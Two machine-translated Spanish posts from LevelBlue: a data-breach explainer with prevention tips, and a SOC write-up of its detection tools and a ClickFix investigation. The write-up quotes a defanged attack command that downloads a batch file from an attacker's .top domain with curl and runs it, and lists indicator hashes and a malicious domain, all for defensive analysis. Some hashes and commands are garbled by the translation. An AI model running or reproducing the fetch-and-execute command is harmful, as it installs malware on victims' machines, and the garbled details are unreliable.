Seamos honestos: pocas frases pueden hacer que su estómago caiga más rápido que «sus datos se han visto comprometidos». Ya sea que sea un individuo que intente proteger sus contraseñas o una empresa que administra millones de cuentas de clientes, el miedo a una violación de datos es real y creciente. Vivimos en un momento en que casi todo está en línea: nuestras finanzas, nuestros registros de salud, nuestras identidades. Y si bien esa conectividad facilita la vida de muchas maneras, también deja la puerta abierta para que los ciberdelincuentes se cuelen. Es posible que se haya preguntado, ¿qué es una violación de datos? ¿O cómo sucede? Y más urgentemente: ¿cómo puedo evitar que me pase? Vamos a desempacarlo, sin jerga, sin drama. Solo los hechos, los riesgos reales y lo que puede hacer para mantenerse a salvo. Entonces, ¿qué es una violación de datos? En esencia, una violación de datos ocurre cuando alguien que no debería tener acceso a información confidencial tiene sus manos. Piense en ello como alguien que recoge la cerradura en su puerta de entrada digital y se aleja con sus secretos personales o comerciales. Esto podría ser cualquier cosa, desde un hacker que roba números de tarjetas de crédito, hasta un empleado que envía accidentalmente el archivo incorrecto, hasta un servidor en la nube mal configurado que filtra datos sin que nadie se dé cuenta. Ya sea deliberado o no, el resultado es el mismo: la información privada se expone. El término «violación masiva de datos» generalmente se refiere a los casos de titulares en los que se ven afectados millones de registros, o incluso miles de millones,. Estos eventos no son solo caros; Son profundamente personales. La gente pierde confianza. Las empresas pierden clientes. Y la recuperación puede llevar años. Algunos ejemplos de la vida real (sin la caída de los nombres) probablemente haya leído sobre grandes infracciones donde los nombres de usuario y las contraseñas terminan a la venta en la web oscura. Estos casos a menudo involucran a los atacantes que explotan pequeñas debilidades, como software obsoleto o credenciales reutilizadas, para acceder a una mina de oro de información. ¿Alguna vez recibió una notificación de Apple diciendo que su contraseña «apareció en una filtración de datos»? Eso significa que sus credenciales fueron encontradas flotando en una base de datos comprometida. Tal vez usaste esa misma contraseña en otros cinco sitios. Ahora los cinco son vulnerables. Y así, un solo enlace débil puede abrir las compuertas. ¿Por qué siguen sucediendo estas violaciones? No lo endulzamos. A menudo somos el enlace más débil. La forma más común en que ocurren las violaciones no es un ataque de alta tecnología al estilo de James Bond. Es phishing. Un correo electrónico aparentemente inocente engaña a alguien para que haga clic en un enlace malo o entregue su información de inicio de sesión. Otras causas? Contraseñas que son demasiado cortas, demasiado simples o utilizadas en todas partes. Software que no se ha actualizado en meses (o años). Las computadoras portátiles fuera de lugar, teléfonos perdidos o Wi-Fi no garantizado. Empleados que simplemente no sabían mejor. La realidad es que la mayoría de las violaciones de datos son evitables, pero solo si estamos prestando atención y tomando medidas antes de que sea demasiado tarde. Cómo mantener a los malos buenas noticias: no eres impotente. Si bien no hay bala de plata, algunos hábitos inteligentes pueden ser muy útiles para mantener sus datos seguros. Doble la seguridad con la autenticación MFA multifactor es como poner un segundo cerrojo en su puerta. Incluso si alguien obtiene su contraseña, aún necesitará otra pieza del rompecabezas, como un código en su teléfono o su huella digital. Deja de usar en serio «123456». Use contraseñas fuertes y únicas. Mejor aún, deje que un administrador de contraseñas lo maneje por usted. Están construidos para este problema exacto. Mantenga sus sistemas actualizados, sí, esos molestos recordatorios de actualización son importantes. A los hackers les encanta el software antiguo porque está lleno de agujeros. Parchearlos cierra la puerta antes de que alguien la atraviese. Esté atento a su red, las amenazas cibernéticas pueden esconderse a la vista. Es por eso que servicios como la detección y respuesta administrada de LevelBlue (MDR) son un cambio de juego. Monitorean su entorno las 24 horas, los 7 días de la semana, listos para actuar en el momento en que algo mira. Enseñe a su equipo los correos electrónicos de phishing son inteligentes. Capacitar a su personal para detectarlo puede marcar la diferencia. Y generalmente es mucho más barato que lidiar con una violación. Cifre lo que importa si alguien roba sus datos, el cifrado lo hace ilegible. Piense en ello como convertir su información en un rompecabezas sin la caja. Tenga un plan antes de que necesite uno si lo peor sucede, no desea estar luchando. Construya un plan de respuesta a incidentes ahora. Probarlo. Actualizarlo. Poseerlo. ¿Quieres más detalles? Hemos reunido un excelente desglose de las estrategias de recuperación de incumplimiento que vale la pena visitar. ¿Qué pasa si sucede de todos modos? Si te encuentras en medio de una violación, esto es lo que debes hacer: si eres un negocio: bloquea las cosas rápidamente. Haga que sus equipos legales y de seguridad involucren de inmediato notifiquen a los usuarios y reguladores según sea necesario. Investigue lo que salió mal y solucionó el problema raíz. Trabaje con expertos en forense digital para comprender el ataque y evitar una repetición. Si es un individuo: cambie sus contraseñas (sí, allo). Encienda MFA donde pueda. Observe sus extractos bancarios e informes de crédito como un halcón. Esté en alerta por los intentos de phishing o la actividad sospechosa. Las violaciones de datos de la pieza de cumplimiento no son solo desordenadas. También pueden llevarlo en agua caliente legal. Si está manejando los datos de los clientes, las regulaciones de privacidad como el GDPR requieren que lo mantenga seguro y le diga a la gente cuándo sale algo mal. El incumplimiento puede costarle, literalmente. Los costos acumulativos pueden alcanzar un millón de dólares como se hace referencia en nuestro blog reciente. Entonces, volviendo a esa gran pregunta: ¿Qué es una violación de datos? Es más que un titular o un problema tecnológico. Es un problema humano, basado en la confianza y roto por negligencia, ignorancia o malas intenciones. Pero hay un lado positivo: la mayoría de las violaciones no son inevitables. Con la mentalidad y las herramientas correctas, se pueden prevenir. La ciberseguridad no tiene que dar miedo. Solo tiene que ser una prioridad. Ya sea que sea un emprendedor solista o una empresa global, tiene el poder de tomar decisiones más inteligentes y asociarse con expertos que saben cómo ayudar. LevelBlue está aquí para ti. Desde el monitoreo de amenazas 24/7 y un enfoque proactivo para el cumplimiento, hasta la respuesta a incidentes y los forenses digitales, lo ayudamos a proteger lo que más importa. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.
Etiqueta: LABORA DE LABORA DEL LUVEBLUE
Un cinturón de herramientas SOC para mantener el ritmo de las amenazas en rápida evolución y los tiempos decrecientes de los atacantes, el equipo de operaciones de seguridad LevelBlue aprovecha múltiples herramientas y asociaciones clave para acortar el tiempo entre la detección y la respuesta. A continuación se presentan algunos ejemplos de las herramientas utilizadas por nuestro SOC y algunas de las circunstancias en las que se utilizaría cada herramienta. Una asociación con Sentinelone a través de la seguridad de punto final administrada de LevelBlue con Sentinelone, nuestro SOC ha proporcionado un valor excepcional con una mayor protección y visibilidad de punto final a nuestros clientes. El SOC pudo reducir en gran medida el tiempo entre la detección y la respuesta con las alarmas STAR (respuesta activa de la historia) dentro de Sentinelone. Estas alarmas estelares son construidas a medida por nuestro equipo y están informadas por detecciones proactivas de nuestros cazadores de amenazas en torno a amenazas recientes y TTP (técnicas, tácticas y procedimientos). Al utilizar informes de inteligencia de amenazas y datos en cuestión, nuestro equipo pudo realizar una revisión más profunda sobre los TTP de amenazas recientes. Esto permitió la creación de reglas personalizadas para detectar más rápidamente los COI (indicadores de compromiso) dentro de los entornos de nuestros clientes. Nuestro equipo de inteligencia de amenazas de LevelBlue Labs también utilizó esta información para crear nuevas reglas en USM en cualquier lugar, nuestra plataforma Open XDR. Como socio de seguridad de confianza, LevelBlue siempre se esfuerza por mejorar nuestros tiempos de detección y respuesta para aumentar el valor y proporcionar un apoyo más proactivo a nuestros clientes. Estas herramientas son vitales para que podamos mejorar los tiempos de respuesta y evitar que las amenazas afecten a nuestros clientes. Bundling Seguridad de punto final administrado y detección y respuesta de amenazas administradas es una excelente opción para los clientes que carecen de ingestión de datos desde los puntos finales en USMA y desean una mejor visibilidad. El paquete también beneficia a los clientes que buscan equilibrar el costo de los socios de seguridad de terceros con los costos de las herramientas de monitoreo adicionales. En lugar de comprar múltiples herramientas para llevar datos potencialmente ruidosos a la USMA, Bundling proporciona una visibilidad integral en sus puntos finales junto con el monitoreo 24/7 que es parte de nuestra oferta administrada de detección de amenazas y respuesta. Intercambio de amenazas abiertas (OTX) El Lablue Labs Open Amenic Exchange (OTX) es otra herramienta integral de la que dependen nuestros analistas durante el triaje e investigación de alarma. Esta plataforma es una de las comunidades de inteligencia de amenazas más grandes con más de 330k+ miembros en todo el mundo. LevelBlue Labs actualiza continuamente OTX, y la inteligencia de amenazas de OTX se integra perfectamente en la plataforma USMA de LevelBlue. Los entornos de nuestros clientes están escaneados para los partidos de pulso OTX y los COI. Si se descubre un indicador de un pulso al cliente en su entorno, se genera una alarma. Al examinar una alarma en USMA, los analistas están dirigidos al pulso asociado. El analista puede usar los COI adicionales asociados con ese pulso para promover su investigación. La centralización de esta información en USMA ayuda a nuestros analistas a racionalizar el triaaje de incidentes y estos pulsos se pueden comparar con otra inteligencia de código abierto (OSINT) para dar a los analistas más contexto en su investigación. Los analistas también pueden usar la ID de pulso OTX directamente dentro de USMA para consultar el entorno de los clientes para cualquier COI adicional asociado con la amenaza que se está investigando. Figura 1: Búsqueda de eventos de instancia del cliente utilizando reglas de estrella de ID de OTX El SoC LevelBlue también ha creado un sistema de alerta personalizado basado en métodos de detección de alta fidelidad que ha aumentado los tiempos de respuesta al brindar estas alertas a la vanguardia de la atención de nuestros analistas. Estos métodos de alta fidelidad, ya sea relacionados con las reglas de estrella personalizadas o las detecciones de compromiso del usuario, son solo otro ejemplo del trabajo proactivo que hace nuestro equipo SOC para mejorar el valor para nuestros clientes. Las Reglas de Star de Sentinelone han demostrado ser una adición invaluable al conjunto de herramientas de detección ya utilizados por el Soc MDR. Cuando se detecta una amenaza y se ha planteado una alarma, un analista de SOC utilizará diferentes herramientas para analizar la amenaza y sus artefactos relacionados. El SOC LevelBlue investiga: ClickFix ClickFix es una campaña de ingeniería social que explota la apariencia de legitimidad para engañar a las víctimas para ejecutar guiones maliciosos. En la siguiente investigación, el SOC utilizó varias herramientas, incluidas las sandbox de Joe, la visibilidad profunda de Sentinelone y la lista de bloques Sentinelone para analizar un ataque de clickFix. La investigación comenzó cuando el SOC recibió una alarma para una línea de comando que es indicativa de malware ClickFix (ver Figura 2). Figura 2: Alarma ClickFix En USMA La línea de comando que se muestra arriba permitió a nuestro equipo obtener el archivo y la información de ese archivo. Con esto, nuestro equipo podría buscar en nuestra base de clientes para determinar si el archivo existía en cualquier otro entorno y agregar los hashs de archivo a nuestra lista de bloques Global Sentinelone. Para revisar esta línea de comando, el SOC generalmente utilizaría un servicio de sandbox en línea como Sandbox de Joe o Anyrun. Joe’s Sandbox es preferible en caso de que haya datos de clientes presentes, porque se ejecuta en un inquilino privado. AnyRun también es una herramienta poderosa, pero su servicio gratuito no es privado y se usa solo si se confirma que no se contienen datos del cliente. Después de ejecutar la línea de comando anterior en Joe’s Sandbox, recibimos un informe de actividad en profundidad (ver Figura 3 a continuación). Figura 3: Línea de comando inicial ejecutada en el ataque de ClickFix después de ejecutar el comando en Joe’s Sandbox, nada apareció en el frente, pero obtuvimos una lista de archivos sospechosos en el informe que se generó (ver Figura 4 a continuación). Figura 4: Lista de archivos sospechosos del informe Sandbox de Joe del archivo. Pudimos recuperar los hashes SHA1 y buscar un compromiso potencial en los entornos de nuestros clientes agrupados. Usando la visibilidad profunda de Sentinelone, nuestro equipo de SOC escribió una consulta simple buscando en los campos de hash de archivo para cualquiera de los hashes obtenidos en nuestro informe: #Hash contiene («A48C95DF3D802FFB6E5ECADA542CC5E028192F2B», «7EC84BE84FE23F0B0093B647538737E1F19EBB03», «C2E5ea8AFCD46694448D812D1FFCD02D1F594022», «3D1999BEE412CBAC0A6D2C4C9FD5509AT12227INE. «98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07», «01873977C871D3346D795CF7E38888685DE9F0B16»,, «C4E27A43075CE993FF6BB033360AF386B2FC58FF», «906F7E94F841D464D4DA144F7C858FA2160E36DB», «, «A556209655DCB5E939FD404F57D199F2BB6DA9B3», «AD464EB7CF5C19C8A443AB5B590440B32DBC618F») Ejecutando esta consulta mostró US 5 detecciones de un incidente que ocurrió una semana antes en un entorno de diferentes clientes (vea la figura de diferentes clientes (vea la figura 5 a continuación. Figura 5: Detecciones de consultas que buscan hash obtenidos en el informe Nuestro equipo también utilizó la función de lista de bloques de Sentinelone para agregar estos hashes a Blocklist a nivel de alcance global para garantizar que el archivo se mate y se ponga en cuarentena si se detecta en un entorno de cliente (ver Figura 6). Figura 6: Agregar el hash SHA1 de NetSupport Rat a Sentinelone Global Blocklist Al realizar un análisis estático de un sitio web o un enlace de phishing potencial, nuestros analistas normalmente utilizarán un servicio que visita el sitio y proporciona una captura de pantalla de la página, junto con información que incluye el código fuente de la página, redireccionamientos, scripts y cualquier imagen. En el siguiente escenario, nuestro equipo recibió una alarma para una solicitud de DNS a un dominio sospechoso que se incluye en nuestros pulsos OTX (Figura 7). Figura 7: Alarma OTX En USMA para el sitio web comprometido responsable del ataque de ClickFix al revisión inicial, el dominio parecía pertenecer a un sitio web de viajes normal. Luego, nuestro equipo inspeccionó el tráfico de red desde el escaneo del sitio web en la pestaña HTTP a continuación y buscó cualquier redirección que ocurriera durante el escaneo en la pestaña Redireccionamientos (ver Figura 8). Figura 8: escaneo de URL del sitio comprometido Islonline[.]org en la pestaña HTTP, nuestro equipo vio que un archivo titulado J.JS alojado en el sitio navegado al sitio Hxxps[://]lang3666[.]TOP/LV/XFA[.]. Figura 9: Redirigir al archivo JS sospechoso y el dominio .TOP al ejecutar un escaneo de URL, nuestros analistas pudieron recuperar el código fuente del archivo JS: Figura 10: Código fuente del archivo JS alojado en el dominio .TOP Revisión adicional del archivo reveló un script ofuscanado que se usa para determinar si el agente de usuarios es un teléfono móvil o escritorio. El script luego genera un identificador de 8 dígitos que luego se adjunta a la URL HXXPS[://]lang3666[.]superior/lv/índice[.]PHP?. Esto da como resultado descargar otro script para obtener la carga útil final. Los ataques de clickFix a menudo siguen esta cadena de eventos y dan como resultado un comando similar al que se muestra a continuación: cmd.exe/c curl.exe -k -ss -x post https: // pravaix[.]superior/lv/lll[.]php -o «c: \ users \ public \ jkdfgf.bat» && start /min “” c: \ users \ public \ jkdfgf.bat Conclusión Como se ve en la investigación de ClickFix anterior, las integraciones de USM Anywhere permiten que el SoC LevelBlue reduzca en gran medida el tiempo entre la detección y la respuesta. Puede leer más sobre ClickFix y las recomendaciones de LevelBlue SoC para proteger sus entornos en el informe de las tendencias de amenaza de LevelBlue, Foot Me Once: cómo los cibercriminales están dominando el arte del engaño. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.